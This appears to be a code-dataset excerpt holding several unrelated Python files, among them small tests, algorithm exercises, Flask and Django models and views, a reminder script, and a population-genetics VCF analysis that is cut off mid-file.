seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
5198901937 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
import unittest
import yalix.repl as repl
import yalix.utils as utils
def send_inputs(*args):
# count always starts from 1
def invoke(count):
try:
cmd = args[count - 1]
if isinstance(cmd, str):
yield cmd
else:
raise cmd
except IndexError:
raise EOFError()
return invoke
def capture_outputs(collector):
""" Collector should be dict-like """
def invoke(result, count):
collector[count] = result
return invoke
class ReplTests(unittest.TestCase):
def test_license(self):
self.assertTrue(len(repl.license()) > 0)
self.assertTrue(str(datetime.now().year) in repl.license())
def test_copyright(self):
self.assertTrue(len(repl.copyright()) > 0)
self.assertTrue(str(datetime.now().year) in repl.copyright())
def test_help(self):
self.assertTrue(len(repl.help()) > 0)
self.assertTrue('github.com/rm-hull/yalix' in repl.help())
def test_init_readline(self):
with utils.capture() as out:
repl.init_readline({})
self.assertTrue('Reading history' in out[0])
self.assertTrue('DONE' in out[0] or 'FAILED' in out[0])
def test_repl_starts_OK(self):
commands = send_inputs("(+ 1 2 3 4)", "(iterate inc 0)",
KeyboardInterrupt())
results = {}
collector = capture_outputs(results)
with utils.capture() as out:
repl.repl(inprompt=commands, outprompt=collector)
self.assertEqual('10', results[1])
self.assertEqual(
'(0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ...)', results[2])
self.assertTrue('KeyboardInterrupt' in out[0])
self.assertTrue('Bye!' in out[0])
if __name__ == '__main__':
unittest.main()
| rm-hull/yalix | python/tests/repl_test.py | repl_test.py | py | 1,934 | python | en | code | 5 | github-code | 36 |
39370596177 | def fibonacci(n):
if n == 1 or n == 2:
return 1
prev, curr = 1, 1
for i in range(2, n):
tmp = prev
prev = curr
curr = prev + tmp
return curr
x = int(input())
print(fibonacci(x))
| bbpythoncourse/python | 4/4.4.py | 4.4.py | py | 238 | python | en | code | 0 | github-code | 36 |
41585308053 | from flask.ext.mongokit import MongoKit, Document
from datetime import datetime
from sensorapp import db, app
@db.register
class Device(Document):
__database__ = app.config["DB_NAME"]
__collection__ = "device"
structure = {
'name': unicode,
'digit_pin_num': int,
'analog_pin_num': int,
'type': unicode,
'location': unicode,
'sensor_list': list,
'actuator_list': list,
'created_user':unicode,
'created_time': datetime
}
required_fields = ['name', 'created_time']
default_values = {'created_time': datetime.utcnow()}
use_dot_notation = True
@db.register
class Sensor(Document):
__database__ = app.config["DB_NAME"]
__collection__ = "sensor"
structure = {
'name': unicode,
'type': unicode,
'digit_or_analog': unicode,
'location': unicode,
'ability': unicode,
'at_device_id': unicode,
'at_device_name': unicode,
'at_pin': int,
'created_user': unicode,
'created_time': datetime
}
required_fields = ['name', 'created_time']
default_values = {'created_time': datetime.utcnow()}
use_dot_notation = True
@db.register
class Actuator(Document):
__database__ = app.config["DB_NAME"]
__collection__ = "actuator"
structure = {
'name': unicode,
'type': unicode,
'digit_or_analog': unicode,
'location': unicode,
'ability': unicode,
'at_device_id': unicode,
'at_device_name': unicode,
'at_pin': int,
'created_user': unicode,
'created_time': datetime
}
required_fields = ['name', 'created_time']
default_values = {'created_time': datetime.utcnow()}
use_dot_notation = True
@db.register
class SensorData(Document):
__database__ = app.config["DB_NAME"]
__collection__ = "sensordata"
structure = {
'value': float,
'from_sensor_id': unicode,
'from_sensor_name': unicode,
'sensing_time': datetime,
'created_time': datetime
}
required_fields = ['value', 'from_sensor_name', 'sensing_time' ,'created_time']
default_values = {'created_time': datetime.utcnow()}
use_dot_notation = True
@db.register
class ActuatorData(Document):
__database__ = app.config["DB_NAME"]
__collection__ = "actuatordata"
structure = {
'value': float,
'from_actuator_id': unicode,
'from_actuator_name': unicode,
'created_by': unicode,
'acting_time': datetime,
'created_time': datetime
}
required_fields = ['value', 'from_actuator_name', 'acting_time' ,'created_time']
default_values = {'created_time': datetime.utcnow()}
use_dot_notation = True
db.register([Device])
db.register([Sensor])
db.register([Actuator])
db.register([SensorData])
db.register([ActuatorData])
| janetyc/SensorIoT | sensorapp/models.py | models.py | py | 2,885 | python | en | code | 0 | github-code | 36 |
24969027415 | from typing import List
class Solution:
def dailyTemperatures(self, temperatures: List[int]) -> List[int]:
ans = [0] * len(temperatures)
stack = []
for i, v in enumerate(temperatures):
while stack and stack[-1][1] < v:
index, value = stack.pop()
ans[index] = i - index
stack.append([i, v])
print(f"stack: {stack}")
return ans
sol = Solution()
print(sol.dailyTemperatures(temperatures=[73, 74, 75, 71, 69, 72, 76, 73]))
| inverseTrig/leet_code | 739_daily_temperatures.py | 739_daily_temperatures.py | py | 530 | python | en | code | 0 | github-code | 36 |
42712331906 | def solution_long(start, length, debug=False):
"""
Known Working Solution
:param start:
:param length:
:param debug:
:return:
"""
if start < 0 or start > 2000000000 or length < 1 or start + length > 2000000000:
return 0
skip_start = length
run_checksum = 0
worker = start
while skip_start > 0:
debug_line = ''
checksum = 0
for place in range(0, length):
if place < skip_start:
debug_line += '({0}^{1})'.format(checksum, worker)
checksum ^= worker
debug_line += '={0} '.format(checksum)
worker += 1
else:
worker += length - place
break
skip_start -= 1
run_checksum ^= checksum
if debug:
print(debug_line+' '+str(run_checksum))
return run_checksum
def solution(start, length):
if start < 0 or start > 2000000000 or length < 1 or start + length > 2000000000:
return 0
check_length = length
running_checksum = 0
front_worker = start
while check_length > 0:
if check_length > 5:
repeat_blocks = int(check_length / 4)
jump_start = (repeat_blocks * 4) + front_worker
check_from_worker_idx = (repeat_blocks * 4)
if front_worker % 2 == 0:
checksum = 0
else:
jump_start -= 3
check_from_worker_idx -= 3
checksum = front_worker
else:
jump_start = front_worker
checksum = 0
check_from_worker_idx = 0
while check_from_worker_idx < check_length:
checksum ^= jump_start
jump_start += 1
check_from_worker_idx += 1
front_worker += length
check_length -= 1
running_checksum ^= checksum
return running_checksum
if __name__ == "__main__":
start = 3
end = 17
debug = True
print('<<< old faithful >>>')
c = solution_long(start, end, debug)
print('<<< new one >>>')
c = solution(start, end, debug)
| drewtuley/LAMBCHOP | SecurityQueue/queue_to_do.py | queue_to_do.py | py | 2,128 | python | en | code | 0 | github-code | 36 |
72045571623 | puzzle = open('puzzle', 'r').read().strip()
puzzle = list(map(int, puzzle.split()))
def get_nodes(x):
child_nodes = x[0]
metadata_entries = x[1]
ret = []
ret_sum = 0
steps = 0
for i in range(child_nodes):
sub = get_nodes(x[2+steps:])
ret.append(sub[0])
steps += sub[1]
if child_nodes == 0:
ret_sum = sum(x[2+steps: 2+steps+metadata_entries])
else:
for v in x[2+steps: 2+steps+metadata_entries]:
if v-1 < len(ret):
ret_sum += ret[v-1]
steps += 2 + metadata_entries
return ret_sum, steps
print(get_nodes(puzzle)[0]) | filipmlynarski/Advent-of-Code-2018 | day_08/day_8_part_2.py | day_8_part_2.py | py | 549 | python | en | code | 0 | github-code | 36 |
25955407466 | import time
class Profiler:
'''
A small profiler class for measuring how long a block of code runs.
This should be used like:
```
with Profiler('label'):
# code to run here
```
and will automatically print runtime information. Additionally, if
multiple `with` blocks are nested they will be displayed hierarchically.
'''
enabled = True
current = None
tab_width = 2
def __init__(self, section_name):
self.section_name = section_name
self.children = []
def __enter__(self):
if not Profiler.enabled:
return
self.parent = Profiler.current
if self.parent is not None:
self.parent.children.append(self)
Profiler.current = self
self.start_time = time.time()
return self
def print_recursive(self, level):
print(((level * Profiler.tab_width) * ' ') + f'[{self.section_name}] {self.running_time:.5f}s')
for child in self.children:
child.print_recursive(level + 1)
def __exit__(self, type, value, tb):
if type is not None:
raise value
if not Profiler.enabled:
return True
self.running_time = time.time() - self.start_time
if self.parent is None:
self.print_recursive(0)
Profiler.current = self.parent
return True
| nicknytko/numml | numml/profiler.py | profiler.py | py | 1,389 | python | en | code | 9 | github-code | 36 |
11685619050 | from django.shortcuts import render
from django.shortcuts import render,redirect
from django.contrib.auth.forms import UserCreationForm,AuthenticationForm
# from .models import Device
from django.contrib.auth import authenticate
from django.contrib.auth import login
#from .forms import SignUpForm
from django.core.mail import send_mail
from django.conf import settings
from rest_framework.decorators import api_view
import csv,io
from .forms import *
from .models import *
from django.views.generic import TemplateView
from django.shortcuts import get_object_or_404
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
def signup_view(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
print("Saved user")
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
to_email= form.cleaned_data.get('email')
print(username,raw_password)
user = authenticate(username=username, password=raw_password)
send_mail(
'Congratulations',
'Congratulations you are now registered',
settings.EMAIL_HOST_USER,
[to_email],
fail_silently=False,
)
else:
form = SignUpForm()
return render(request,'newops/signup.html',{'form':form})
def login_view(request):
if request.method=="POST":
form = AuthenticationForm(data=request.POST)
if form.is_valid():
user=form.get_user()
login(request,user)
return render(request,'newops/hello.html')
else:
form = AuthenticationForm()
return render(request,'newops/login.html',{'form':form})
def hello(request):
return render(request,'newops/hello.html')
#API
class ApplicationDetail(APIView):
def post(self, request):
print(request.data)
Application.objects.create(app_name = request.data.get('app_name'),app_function = request.data.get('app_function'),app_type = request.data.get('app_type'))
return redirect('../hello')
def details(request):
return render(request,'newops/applicationapi.html')
class AssestDetail(APIView):
def post(self, request):
customer_id_list = request.data.getlist('Customer_ID_id')
app_name_list = request.data.getlist('app_name')
page_list = request.data.getlist('page_name')
device_list = request.data.getlist('device_registration_name')
for i in range(len(customer_id_list)):
customer_id_list[i] = Customer.objects.get(company_name=customer_id_list[i])
obj = AssetGroup.objects.create(assestname = request.data.get('assestname'),Customer_ID = customer_id_list[0])
for i in range(len(page_list)):
obj.pagename.add(Pages.objects.filter(page_name=page_list[i]).first())
for i in range(len(device_list)):
obj.devicename.add(Device.objects.filter(device_registration_name=device_list[i]).first())
for i in range(len(app_name_list)):
obj.appname.add(Application.objects.filter(app_name=app_name_list[i]).first())
obj.save()
return redirect('../hello')
def assestdetails(request):
return render(request,'newops/assestgroupapi.html',{'customerquery':Customer.objects.all(),'appquery':Application.objects.all(),'pagequery':Pages.objects.all(),'devicequery':Device.objects.all()})
class DeviceSpecDetail(APIView):
def post(self, request):
DeviceSpecification.objects.create(techSpecificationID = request.data.get('techSpecificationID'),
techSpecificationName = request.data.get('techSpecificationName'),device_type = request.data.get('device_type'),
gps=request.data.get('gps'),gsm=request.data.get('gsm'),wifi=request.data.get('wifi'),ble=request.data.get('ble'),
zigbee=request.data.get('zigbee'),zigwave=request.data.get('zigbee'),rs_232=request.data.get('rs_232'),
rs_485=request.data.get('rs_485'),rs_422=request.data.get('rs_422'),tcp=request.data.get('tcp'),mqtt=request.data.get('mqtt'),
http=request.data.get('http'),symetric_key=request.data.get('symetric_key'),x509_Certificate=request.data.get('x509_Certificate'),
ota=request.data.get('ota'),inputs=request.data.get('inputs'),outputs=request.data.get('outputs'),ethernet=request.data.get('ethernet'),
analog_input=request.data.get('analog_input'),power_supply=request.data.get('power_supply'),other1=request.data.get('other1'),
other2=request.data.get('other2'),other3=request.data.get('other3'),security_key=request.data.get('security_key'))
return redirect('../hello')
def devicespec_details(request):
return render(request,'newops/devicespecapi.html')
class VendorDetail(APIView):
def post(self, request):
Vendor.objects.create(vendor_name=request.data.get('vendor_name'),vendor_address=request.data.get('vendor_address'),
vendor_city=request.data.get('vendor_city'),vendor_country=request.data.get('vendor_country'),zip_code=request.data.get('zip_code'),
vendor_contact=request.data.get('vendor_contact'),vendor_email=request.data.get('vendor_email'),web=request.data.get('web'),
vendor_VAT=request.data.get('vendor_VAT'),vendor_other1=request.data.get('vendor_other1'),vendor_other2=request.data.get('vendor_other2'),
vendor_other3=request.data.get('vendor_other2'))
return redirect('../hello')
def vendor_details(request):
return render(request,'newops/vendorapi.html')
class IAMDetail(APIView):
def post(self, request):
Device_IAM_Mechanism.objects.create(IAM=request.data.get('IAM'))
return redirect('../hello')
def IAM_details(request):
return render(request,'newops/iamapi.html')
class DPSDetail(APIView):
def post(self,request):
DPS_Property.objects.create(dps_name=request.data.get('dps_name'),resourse_type=request.data.get('resourse_type'),
location=request.data.get('location'),location_ID=request.data.get('location_ID'),resourse_ID=request.data.get('resourse_ID'),
resourse_group=request.data.get('resourse_group'),resourse_group_id=request.data.get('resourse_group_id'),subscription=request.data.get('subscription'),
subscription_id=request.data.get('subscription_id'))
return redirect('../hello')
def DPS_details(request):
return render(request,'newops/dpsapi.html')
class usergroupDetail(APIView):
def post(self,request):
UserGroup.objects.create(usergroup=request.data.get('usergroup'),superadmin=request.data.get('superadmin'),
admin=request.data.get('admin'),localadmin=request.data.get('localadmin'),manager=request.data.get('manager'),
supervisor=request.data.get('supervisor'),operator=request.data.get('operator'),support=request.data.get('support'),
staff=request.data.get('staff'),other1=request.data.get('other1'),other2=request.data.get('other2'))
return redirect('../hello')
def Usergroup_details(request):
return render(request,'newops/usergroupapi.html')
class IotDetail(APIView):
def post(self,request):
resourse_group_list = request.data.getlist('resourse_group')
print(resourse_group_list)
for i in range(len(resourse_group_list)):
resourse_group_list[i] = DPS_Property.objects.filter(resourse_group=resourse_group_list[i]).first()
IOT_Hub.objects.create(hub_name=request.data.get('hub_name'),hostname=request.data.get('hostname'),status=request.data.get('status'),
current_location=request.data.get('current_location'),subscription=request.data.get('subscription'),resourse_group=resourse_group_list[0])
return redirect('../hello')
def IOT_details(request):
return render(request,'newops/iotapi.html',{'dpsquery':DPS_Property.objects.all()})
class CADetail(APIView):
def post(self,request):
CA.objects.create(CAtype=request.data.get('CAtype'))
return redirect('../hello')
def CA_details(request):
return render(request,'newops/caapi.html')
class UserTypeDetail(APIView):
def post(self,request):
Usertype.objects.create(user_type=request.data.get('user_type'))
return redirect('../hello')
def Usertype_details(request):
return render(request,'newops/usertypeapi.html')
class PermissionDetail(APIView):
def post(self,request):
Permissions.objects.create(permission_name=request.data.get('permission_name'),add_permission=request.data.get('add_permission'),
edit_permission=request.data.get('edit_permission'),modify_permission=request.data.get('modify_permission'),
view_permission=request.data.get('view_permission'),log_permission=request.data.get('log_permission'),delete_permission=request.data.get('delete_permission'))
return redirect('../hello')
def Permission_details(request):
return render(request,'newops/permissionapi.html')
class CustomerDetail(APIView):
def post(self,request):
app_list = request.data.getlist('application')
print(app_list)
for i in range(len(app_list)):
app_list[i] = Application.objects.filter(app_name=app_list[i]).first()
Customer.objects.create(company_name=request.data.get('company_name'),address=request.data.get('address'),city=request.data.get('city'),
country=request.data.get('country'),zip_code=request.data.get('zip_code'),primary_contact_person=request.data.get('primary_contact_person'),
designation=request.data.get('designation'),primary_email=request.data.get('primary_email'),secondary_contact_person=request.data.get('secondary_contact_person'),
s_designation=request.data.get('s_designation'),secondary_email=request.data.get('secondary_email'),website=request.data.get('website'),
gst=request.data.get('gst'),vat=request.data.get('vat'),installation_mode=request.data.get('installation_mode'),no_of_site=request.data.get('no_of_site'),
site1=request.data.get('site1'),site2=request.data.get('site2'),site3=request.data.get('site3'),address_site1=request.data.get('address_site1'),
address_site2=request.data.get('address_site2'),address_site3=request.data.get('address_site3'),city_site1=request.data.get('city_site1'),city_site2=request.data.get('city_site2'),
city_site3=request.data.get('city_site3'),country_site1=request.data.get('country_site1'),country_site2=request.data.get('country_site2'),country_site3=request.data.get('country_site3'),
application=app_list[0])
return redirect('../hello')
def Customer_details(request):
return render(request,'newops/customerapi.html',{'appquery':Application.objects.all()})
class CertificateDetail(APIView):
def post(self,request):
ca_list = request.data.getlist('ca_name')
device_list = request.data.getlist('assignedTo')
for i in range(len(ca_list)):
ca_list[i] = CA.objects.filter(CAtype=ca_list[i]).first()
for i in range(len(device_list)):
device_list[i] = Device.objects.filter(Firmware_version=device_list[i]).first()
Certificate.objects.create(certificate_name=request.data.get('certificate_name'),certFile_type=request.data.get('certFile_type'),
generatedOn=request.data.get('generatedOn'),validity=request.data.get('validity'),uploadedOn=request.data.get('uploadedOn'),assigned=request.data.get('assigned'),
assignedDate=request.data.get('assignedDate'),assignedTo=device_list[0],ca_name=ca_list[0])
return redirect('../hello')
def Certificate_details(request):
return render(request,'newops/certificateapi.html',{'caquery':CA.objects.all(),'devicequery':Device.objects.all()})
class DeviceDetail(APIView):
def post(self,request):
iothublist = request.data.getlist('iot_hub_name')
dpslist = request.data.getlist('dps_property_ID')
vendorlist = request.data.getlist('vendor')
customerlist = request.data.getlist('sold_to_customer')
applist = request.data.getlist('route_to_application')
devicespeclist = request.data.getlist('device_Specification_ID')
IAMlist = request.data.getlist('device_IAM_mechanism')
for i in range(len(iothublist)):
iothublist[i] = IOT_Hub.objects.get(hub_name=iothublist[i])
for i in range(len(dpslist)):
dpslist[i] = DPS_Property.objects.get(dps_name=dpslist[i])
for i in range(len(vendorlist)):
vendorlist[i] = Vendor.objects.get(vendor_name=vendorlist[i])
for i in range(len(customerlist)):
customerlist[i] = Customer.objects.get(company_name=customerlist[i])
for i in range(len(applist)):
applist[i] = Application.objects.get(app_name=applist[i])
for i in range(len(devicespeclist)):
devicespeclist[i] = DeviceSpecification.objects.get(device_type=devicespeclist[i])
obj = Device.objects.create(device_type = request.data.get('device_type'),enrollment_type=request.data.get('enrollment_type'),
device_registration_name=request.data.get('device_registration_name'),iot_hub_name=iothublist[0],dps_property_ID=dpslist[0],
allocation_policy=request.data.get('allocation_policy'),secret_storage=request.data.get('secret_storage'),
operation=request.data.get('operation'),vendor=vendorlist[0],make=request.data.get('make'),model=request.data.get('model'),
serial_number=request.data.get('serial_number'),date_of_purchase=request.data.get('date_of_purchase'),
warrenty_period=request.data.get('warrenty_period'),warrenty_expiry=request.data.get('warrenty_expiry'),
Firmware_version=request.data.get('Firmware_version'),sold_to_customer=customerlist[0],route_to_application=applist[0],configured=request.data.get('configured'),
device_Specification_ID=devicespeclist[0])
for i in range(len(IAMlist)):
obj.device_IAM_mechanism.add(Device_IAM_Mechanism.objects.filter(IAM=IAMlist[i]).first())
obj.save()
return redirect('../hello')
def devicedetails(request):
return render(request,'newops/deviceapi.html',{'customerquery':Customer.objects.all(),'appquery':Application.objects.all(),'iotquery':IOT_Hub.objects.all(),'devicequery':Device.objects.all(),
'vendorquery':Vendor.objects.all(),'IAMquery':Device_IAM_Mechanism.objects.all(),'dpsquery':DPS_Property.objects.all()})
| sanjolisogani/new_ops | newops/views.py | views.py | py | 14,804 | python | en | code | 0 | github-code | 36 |
13419956267 | import pygame,sys
from Room import Room,Overworld
class Game:
def __init__(self) -> None:
self.overworld = Overworld(screen,self.start_game)
self.status = 'overworld'
self.current_room = 0
def start_game(self):
self.room = Room(self.current_room, self.create_overworld)
self.status = "game_running"
def create_overworld(self):
self.overworld = Overworld(screen,self.start_game)
self.status = 'overworld'
def run(self):
if self.status == 'overworld':
self.overworld.run()
else:
self.room.run()
pygame.init()
screen = pygame.display.set_mode((900,506))
pygame.display.set_caption('Text Based Game')
game = Game()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
game.run()
pygame.display.update()
| NishantK30/projects | text based game/main.py | main.py | py | 960 | python | en | code | 0 | github-code | 36 |
15150261198 | #Healthy programmer
# 9am - 5pm
# Water = water.mp3 (3.5 liters)every 40min - Drank - log
# Eyes = eyes.mp3 (Every 30 min) - EyesDone - log
# Pysical Activity = pysical.mp3 (every 45 min)- ExDone - log
#
# Rules - pygame module to play audio
from pygame import mixer
from datetime import datetime
from time import time
def musiconloop(file,stopper):
mixer.init()
mixer.music.load(file)
mixer.music.play()
while True:
input_of_user = input()
if input_of_user == stopper:
mixer.music.stop()
break
def log_now(msg):
with open("mylogs.txt","a") as f:
f.write(f"{msg} {datetime.now()}\n")
if __name__ == '__main__':
init_waters = time()
init_eyes = time()
init_exercise = time()
watersecs = 10 #40min
eyessecs = 30 #30 min
exsecs = 50 #45 min
while True:
if time() - init_waters > watersecs:
print ("Drink Water!! ..Write 'drank' to stop the alarm")
musiconloop('waters.mp3' ,'drank')
init_waters = time()
log_now("Drank water at")
if time() - init_eyes > eyessecs:
print ("Eyes Exercise time!! ..Write 'doneeyes' to stop the alarm")
musiconloop('eyes.mp3' ,'doneeyes')
init_eyes = time()
log_now("Eyes relaxed done at")
if time() - init_exercise > exsecs:
print ("Exercise Time!! ..Write 'doneex' to stop the alarm")
musiconloop('excercise.mp3' ,'doneex')
init_exercise = time()
log_now("Exercise done at")
| entbappy/My-python-projects | Ex7 Healty programmer50.py | Ex7 Healty programmer50.py | py | 1,582 | python | en | code | 2 | github-code | 36 |
28069150292 | # 2021-10-15
# 출처 : https://programmers.co.kr/learn/courses/30/lessons/86491
# 위클리 챌린지 - 8주차_최소직사각형
#sizes=[[60, 50], [30, 70], [60, 30], [80, 40]]
sizes=[[10, 7], [12, 3], [8, 15], [14, 7], [5, 15]]
def solution(sizes):
long=[]
short=[]
for i in sizes:
if i[0]<i[1]:
long.append(i[1])
short.append(i[0])
else:
long.append(i[0])
short.append(i[1])
return max(long)*max(short)
print(solution(sizes)) | hwanginbeom/algorithm_study | WeeklyChallenge/WeeklyChallenge08_kyounglin.py | WeeklyChallenge08_kyounglin.py | py | 517 | python | en | code | 3 | github-code | 36 |
21953618118 | """
Process the VCF file to compute observed values of statistics and
estimate misorientation rate
"""
import egglib
##### PARAMETERS AND CONFIGURATION #####################################
fname = '/home/flavia/flavia_data2/2023/demography/egglib/filtered_genotyped_combined_outgroup_208samples_pass_filter5_renamed.vcf'
NAM_list = ['A-50010-1', 'A-50010-3', 'A-50010-4', 'A-50036-2',
'A-50201-1-1', 'A-50638-1', 'A-50652-1', 'A-52339-1',
'A-52621-1', 'CA-CHAT-1', 'CA-CHAT-3', 'CA-N0L-1',
'CA-N0L-3', 'CA-N0P-1', 'CA-N0P-3', 'CA-N8H', 'CA-N8H-2',
'CA-N8H-3', 'CA-N8H-5', 'CA-N8H-7', 'CA-N8H-8', 'CA-NOL-11',
'CA-NOP1-J0-1', 'CA-NOP_2CO', 'CA-NOP_2CO-12',
'CA-NOP_2CO-5', 'CA-NOP_2CO-7', 'CA-NOP_2CO-9',
'CA-NOR-1B0-6', 'I-61851', 'M2.001', 'M55901-1',
'M9.001', 'MKy7', 'N-68735-17', 'N-68735-1',
'NRRL13649', 'NRRL47509', 'NRRL47511', 'Cg151NY82']
BR_list = ['BR-19920-1', 'BR-40000-1', 'BR-73000-1', 'BR-73800-1',
'BR-73850-1', 'BR-75800-1', 'BR-75900-1', 'BR-75960-1',
'BR-76170-2', 'BR-76170-3', 'BR-79550-1', 'BR-85807-1',
'BR-85925-1', 'BR-85925-2', 'BR-85955-2', 'BR-87120-1',
'BR-98250-1', 'BR-98290-1', 'CG-1P_1M', 'JAB2', 'M5.001']
EUR_list = ['ARG-2301-11', 'ARG-2306-1', 'ARG-2349-1', 'ARG-2349-3',
'ARG-2700-1', 'ARG-2700-2', 'ARG-2700-5', 'ARG-2700-6',
'ARG-5133-12', 'ARG-5133-14', 'ARG-5133-2',
'ARG-5133-21', 'ARG-5133-23', 'ARG-5133-25-1',
'ARG-5133-27-1', 'ARG-5133-28-2', 'ARG-X5196-1',
'ARG-X5196-4', 'CBS252.59',
'CR-10342-4', 'CR-10342-7', 'CR-10344-2', 'CR-10360-1',
'CR-10360-6', 'CR-10370-50', 'CR-10370-68',
'CR-10370-75', 'CR-10370-81', 'CR-31511-1', 'CR-31511-8',
'CR-34000-1', 'CR-34000-3', 'CR-34310-2', 'CR-34543-10',
'CR-34543-1', 'CR-34543-4', 'CR-34543-5', 'CR-34550-2',
'CR-35214-1', 'CR-35430-1', 'CR-35430-2', 'CR-42223-13',
'CR-42223-3', 'CR-42230-1', 'CR-42230-5', 'CR-42230-9',
'CR-43000-1', 'CR-43280-1', 'CR-43380-1', 'CR-43500-11',
'CR-43500-13', 'CR-43500-2', 'CR-43500-4', 'CR-43500-9',
'CR-43532-2', 'CR-49284-5', 'CRO-I-35', 'DMSZ-63127',
'F-40300-1', 'F-40300-2', 'F-40400-1', 'F-40400-2',
'F-40400-3', 'F-40400-5', 'F-40400-6', 'F-40400-8B',
'F-40400-9', 'F-64330-1', 'F-64330-12', 'F-64330-13B',
'F-64330-15', 'F-64330-17', 'F-64330-20', 'F-64330-21',
'F-64330-4', 'F-64330-8', 'F-64330-9', 'F-64370-1',
'F-64370-2', 'F-64410-1', 'F-64410-11', 'F-64410-18',
'F-64410-20', 'F-64410-4', 'F-64410-7', 'F-64410-8',
'FBH-76290', 'P-7565-072-1', 'P-7565-072-8', 'SI-9223-1',
'SI-9223-3', 'SP-36820-5', 'SW-8046-1', 'SW-8046-11',
'SW-8046-3B', 'SW-8046-6', 'SW-8046-8', 'SW-8046-9',
'Sl-9000-1B', 'Sl-9253-1']
OUTGROUP = 'C_navitas'
#### OPEN VCF FILE AND DEFINE STRUCTURE OBJECT #########################
VCF = egglib.io.VCF(fname)
samples = VCF.get_samples() # extract list of sample names
def find_idx(names):
res = []
for name in names:
if name in samples: res.append(samples.index(name))
else: print('missing:', name)
return res
NAM_idx = find_idx(NAM_list)
EUR_idx = find_idx(EUR_list)
BR_idx = find_idx(BR_list)
OTG_idx = samples.index(OUTGROUP)
log = open('results.txt', 'w')
log.write(f'NAM population: listed={len(NAM_list)} found={len(NAM_idx)}\n')
log.write(f'EUR population: listed={len(EUR_list)} found={len(EUR_idx)}\n')
log.write(f'BR population: listed={len(BR_list)} found={len(BR_idx)}\n')
struct = egglib.struct_from_dict(
{None: { # ingroup with a single cluster
'NAM': {f'NAM{i+1}': [idx] for [i, idx] in enumerate(NAM_idx)},
'EUR': {f'EUR{i+1}': [idx] for [i, idx] in enumerate(EUR_idx)},
'BR': {f'BR{i+1}': [idx] for [i, idx] in enumerate(BR_idx)}
}},
{ 'OTG': [OTG_idx] } # outgroup with a single (haploid) individual
)
assert struct.get_populations() == ['NAM', 'EUR', 'BR']
##### CREATE COMPUTESTATS OBJECTS ######################################
cs_dict = {
'all': egglib.stats.ComputeStats(struct=struct, multi=True, triconfig_min=10),
'NAM': egglib.stats.ComputeStats(struct=struct.subset(pops=['NAM']), multi=True),
'EUR': egglib.stats.ComputeStats(struct=struct.subset(pops=['EUR']), multi=True),
'BR': egglib.stats.ComputeStats(struct=struct.subset(pops=['BR']), multi=True),
'NAM-EUR': egglib.stats.ComputeStats(struct=struct.subset(pops=['NAM', 'EUR']), multi=True),
'NAM-BR': egglib.stats.ComputeStats(struct=struct.subset(pops=['NAM', 'BR']), multi=True),
'EUR-BR': egglib.stats.ComputeStats(struct=struct.subset(pops=['EUR', 'BR']), multi=True)}
cs_dict['all'].add_stats('triconfig')
for key in 'all', 'NAM', 'EUR', 'BR':
cs_dict[key].add_stats('thetaW', 'Pi', 'D', 'Dfl', 'F', 'Hsd')
for key in 'all', 'NAM-EUR', 'NAM-BR', 'EUR-BR':
cs_dict[key].add_stats('FstWC', 'Dj')
for key in 'NAM-EUR', 'NAM-BR', 'EUR-BR':
cs_dict[key].add_stats('Dxy', 'Da', 'numSpd', 'numShA', 'numShP')
for cs in cs_dict.values():
cs.add_stats('nseff', 'nseffo', 'lseff', 'lseffo', 'S', 'So')
##### COMPUTE STATISTICS FROM ALL SITES ################################
##### first, without filtering, then with filtering ####################
site = egglib.Site()
cs_site = egglib.stats.ComputeStats(struct=struct)
cs_site.add_stats('Atot', 'Aing', 'ns_site', 'ns_site_o')
for spacer in [0, 100000, 200000, 500000]:
log.write(f'\n*** minimal spacer: {spacer} ***\n\n')
VCF = egglib.io.VCF(fname)
ctg = None
n1 = 0
n3 = 0
n4 = 0
while VCF.read():
if VCF.get_chrom() != ctg:
ctg = VCF.get_chrom()
last = -spacer-1
if VCF.get_pos() < last+spacer:
continue
last = VCF.get_pos()
genos = ['N' if i in ([None], ['*']) else i[0] for i in VCF.get_genotypes()]
site.from_list(genos, egglib.alphabets.DNA)
for cs in cs_dict.values():
cs.process_site(site)
# computing misorientation rate
res = cs_site.process_site(site)
if res['Aing'] == 2 and res['Atot'] > 2:
sys.exit('STOP! third allele in outgroup found!')
if res['Aing'] == 3: n3 += 1
if res['Aing'] == 4: n4 += 1
if res['Aing'] == 1 and res['Atot'] == 2: n1 += 1
stats = {}
for key, cs in cs_dict.items():
log.write(f'{key}\n')
for stat, value in cs.results().items():
log.write(f' {stat}: {value}\n')
stats[f'{key}_{stat}'] = value
print('number of polymorphic sites:', stats['all_S'], 'three alleles:', n3, 'four alleles:', n4, 'fixed with mutation in outgroup:', n1)
with open(f'obs_spacer_{spacer}.txt', 'w') as f:
header = 'all_Dj all_Hsd all_F all_Pi all_D all_Dfl all_FstWC all_thetaW NAM_Hsd NAM_F NAM_Pi NAM_D NAM_Dfl NAM_thetaW EUR_Hsd EUR_F EUR_Pi EUR_D EUR_Dfl EUR_thetaW BR_Hsd BR_F BR_Pi BR_D BR_Dfl BR_thetaW NAM-EUR_numShP NAM-EUR_numSpd NAM-EUR_Da NAM-EUR_Dj NAM-EUR_Dxy NAM-EUR_numShA NAM-EUR_FstWC NAM-BR_numShP NAM-BR_numSpd NAM-BR_Da NAM-BR_Dj NAM-BR_Dxy NAM-BR_numShA NAM-BR_FstWC EUR-BR_numShP EUR-BR_numSpd EUR-BR_Da EUR-BR_Dj EUR-BR_Dxy EUR-BR_numShA EUR-BR_FstWC'
plus = 'ABB ABA AAB PAA PAB APA APB AAP ABP PPA PAP APP PPP'
f.write(header + ' ' + plus + '\n')
obs = [str(stats[key]) for key in header.split()]
obs.extend(map(str, stats['all_triconfig']))
